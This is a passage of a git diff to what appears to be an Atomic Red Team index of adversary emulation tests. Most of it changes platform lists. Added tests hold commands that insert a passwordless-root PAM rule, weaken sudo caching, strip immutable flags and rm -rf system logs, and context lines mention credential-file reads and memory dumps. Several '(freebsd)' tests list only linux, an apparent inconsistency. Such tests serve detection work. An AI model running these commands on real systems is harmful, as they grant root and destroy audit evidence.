the user\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
@@ -90117,7 +90050,7 @@ credential-access:
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -90162,7 +90095,6 @@ credential-access:
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -90468,7 +90400,7 @@ credential-access:
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -90706,7 +90638,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -90747,7 +90679,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -92871,9 +92803,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -92924,7 +92855,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -92986,7 +92917,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -93048,7 +92979,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from
|
||||
@@ -95022,7 +94953,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -95128,7 +95059,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -95158,9 +95088,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -95204,9 +95133,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -96457,7 +96385,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
target_host:
|
||||
description: IP Address / Hostname you want to target.
|
||||
@@ -97138,7 +97066,7 @@ credential-access:
|
||||
auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5
|
||||
description: "/etc/master.passwd file is accessed in FreeBSD environments\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -97157,7 +97085,6 @@ credential-access:
|
||||
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
|
||||
description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -97179,7 +97106,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -97203,7 +97129,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -99059,7 +98984,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -100288,7 +100212,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -100307,7 +100230,6 @@ discovery:
|
||||
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
description: "(requires root)\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -100331,7 +100253,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -100354,7 +100275,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -100411,7 +100331,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -100431,7 +100351,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -100614,7 +100533,7 @@ discovery:
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -101153,7 +101072,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'service -e
|
||||
|
||||
@@ -101283,7 +101202,7 @@ discovery:
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -101521,7 +101440,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -101562,7 +101481,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -101861,7 +101780,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
package_checker:
|
||||
description: Package checking command. pkg info -x samba
|
||||
@@ -102197,7 +102116,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -102258,7 +102176,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat | grep -i "vmm"
|
||||
@@ -102283,7 +102201,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -102357,9 +102274,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'env
|
||||
|
||||
@@ -102588,7 +102504,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat
|
||||
@@ -103128,7 +103044,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -103193,7 +103108,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed.
|
||||
@@ -103405,7 +103320,7 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
|
||||
@@ -104003,9 +103918,8 @@ discovery:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -104031,9 +103945,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -104225,7 +104138,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -104575,7 +104487,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -104793,9 +104704,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
@@ -105024,7 +104934,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /etc/pam.d/passwd
|
||||
|
||||
@@ -105305,7 +105215,6 @@ discovery:
|
||||
Upon successful execution, the output will contain the environment variables that indicate
|
||||
the 5 character locale that can be looked up to correlate the language and territory.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'locale
|
||||
@@ -105363,7 +105272,6 @@ discovery:
|
||||
also used as a builtin command that does not generate syscall telemetry but
|
||||
does provide a list of the environment variables.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -105739,7 +105647,7 @@ discovery:
|
||||
Methods to identify Security Software on an endpoint
|
||||
when sucessfully executed, command shell is going to display AV/Security software it is running.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd''
|
||||
|
||||
@@ -106104,7 +106012,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -106130,7 +106037,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -106324,7 +106230,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'netstat -r | grep default
|
||||
|
||||
@@ -106603,7 +106509,7 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
@@ -107186,7 +107092,7 @@ discovery:
|
||||
description: "Identify system time. Upon execution, the local computer system
|
||||
time and timezone will be displayed. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'date
|
||||
@@ -113671,7 +113577,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -113717,7 +113622,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -113756,7 +113660,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
cped_file_path:
|
||||
@@ -113807,7 +113710,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
private_key_path:
|
||||
@@ -114349,9 +114251,8 @@ impact:
|
||||
This test simulates a high CPU load as you might observe during cryptojacking attacks.
|
||||
End the test by using CTRL/CMD+C to break.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'yes > /dev/null
|
||||
|
||||
@@ -114549,7 +114450,6 @@ impact:
|
||||
Overwrites and deletes a file using DD.
|
||||
To stop the test, break the command with CTRL/CMD+C.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -115231,9 +115131,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to restart (can be minutes or specific time)
|
||||
@@ -115251,9 +115150,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to shutdown (can be minutes or specific time)
|
||||
@@ -115271,9 +115169,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'reboot
|
||||
|
||||
@@ -115286,7 +115183,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -p
|
||||
@@ -115300,7 +115196,7 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -r
|
||||
|
||||
@@ -115326,7 +115222,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff
|
||||
@@ -115340,7 +115235,7 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff -r 3
|
||||
|
||||
@@ -117508,7 +117403,7 @@ initial-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -117549,7 +117444,7 @@ initial-access:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -117591,7 +117486,7 @@ initial-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -118137,7 +118032,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
@@ -118316,7 +118210,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -118338,7 +118231,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
@@ -118738,7 +118630,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
@@ -119022,7 +118913,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
@@ -119069,7 +118959,6 @@ exfiltration:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
steps: "1. On the adversary machine run the below command.\n\n tshark -f
|
||||
@@ -119253,7 +119142,7 @@ exfiltration:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
|
||||
+2808
-136
@@ -669,6 +669,36 @@ defense-evasion:
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM rule (freebsd)
|
||||
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
|
||||
description: |
|
||||
Inserts a rule into a PAM config and then tests it.
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
type: string
|
||||
default: "/etc/pam.d/su"
|
||||
pam_rule:
|
||||
description: Rule to add to the PAM config.
|
||||
type: string
|
||||
default: auth sufficient pam_succeed_if.so uid >= 0
|
||||
index:
|
||||
description: Index where the rule is inserted.
|
||||
type: integer
|
||||
default: 8
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM module
|
||||
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
|
||||
@@ -921,9 +951,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -945,9 +974,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -969,9 +997,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -993,9 +1020,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -1070,9 +1096,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
owner:
|
||||
description: Username of desired owner
|
||||
@@ -1127,6 +1152,24 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: chflags - Remove immutable file attribute
|
||||
auto_generated_guid: 60eee3ea-2ebd-453b-a666-c52ce08d2709
|
||||
description: |
|
||||
Remove's a file's `immutable` attribute using `chflags`.
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_modify:
|
||||
description: Path of the file
|
||||
type: path
|
||||
default: "/tmp/T1222.002.txt"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_modify}
|
||||
chflags simmutable #{file_to_modify}
|
||||
chflags nosimmutable #{file_to_modify}
|
||||
name: sh
|
||||
- name: Chmod through c script
|
||||
auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab
|
||||
description: 'chmods a file using a c script
|
||||
@@ -1158,6 +1201,36 @@ defense-evasion:
|
||||
executor:
|
||||
command: "#{compiled_file} /tmp/ T1222002\n"
|
||||
name: sh
|
||||
- name: Chmod through c script (freebsd)
|
||||
auto_generated_guid: da40b5fe-3098-4b3b-a410-ff177e49ee2e
|
||||
description: 'chmods a file using a c script
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1222.002/src/T1222.002.c
|
||||
compiled_file:
|
||||
description: Path of compiled file
|
||||
type: path
|
||||
default: "/tmp/T1222002"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
|
||||
|
||||
'
|
||||
prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: "#{compiled_file} /tmp/ T1222002\n"
|
||||
name: sh
|
||||
- name: Chown through c script
|
||||
auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389
|
||||
description: 'chowns a file to root using a c script
|
||||
@@ -1192,6 +1265,37 @@ defense-evasion:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Chown through c script (freebsd)
|
||||
auto_generated_guid: eb577a19-b730-4918-9b03-c5edcf51dc4e
|
||||
description: 'chowns a file to root using a c script
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1222.002/src/chown.c
|
||||
compiled_file:
|
||||
description: Path of compiled file
|
||||
type: path
|
||||
default: "/tmp/T1222002own"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
|
||||
|
||||
'
|
||||
prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: "#{compiled_file} #{source_file}\n"
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1216.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -2037,6 +2141,27 @@ defense-evasion:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
|
||||
- name: Sudo usage (freebsd)
|
||||
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
|
||||
description: 'Common Sudo enumeration methods.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
|
||||
- name: Unlimited sudo cache timeout
|
||||
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
@@ -2053,6 +2178,31 @@ defense-evasion:
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Unlimited sudo cache timeout (freebsd)
|
||||
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
This is dangerous to modify without using ''visudo'', do not do this on a
|
||||
production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching
|
||||
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
@@ -2068,6 +2218,30 @@ defense-evasion:
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching (freebsd)
|
||||
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
to modify without using ''visudo'', do not do this on a production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
T1578:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -2602,7 +2776,6 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
@@ -3262,6 +3435,20 @@ defense-evasion:
|
||||
command: |
|
||||
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
|
||||
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
|
||||
- name: Detect Virtualization Environment (FreeBSD)
|
||||
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
|
||||
description: |
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
|
||||
Environment detected"; fi
|
||||
|
||||
'
|
||||
T1070.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -3347,6 +3534,75 @@ defense-evasion:
|
||||
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: rm -rf
|
||||
auto_generated_guid: bd8ccc45-d632-481e-b7cf-c467627d68f9
|
||||
description: 'Delete messages and security logs
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
rm -rf /var/log/messages
|
||||
rm -rf /var/log/security
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Truncate system log files via truncate utility (freebsd)
|
||||
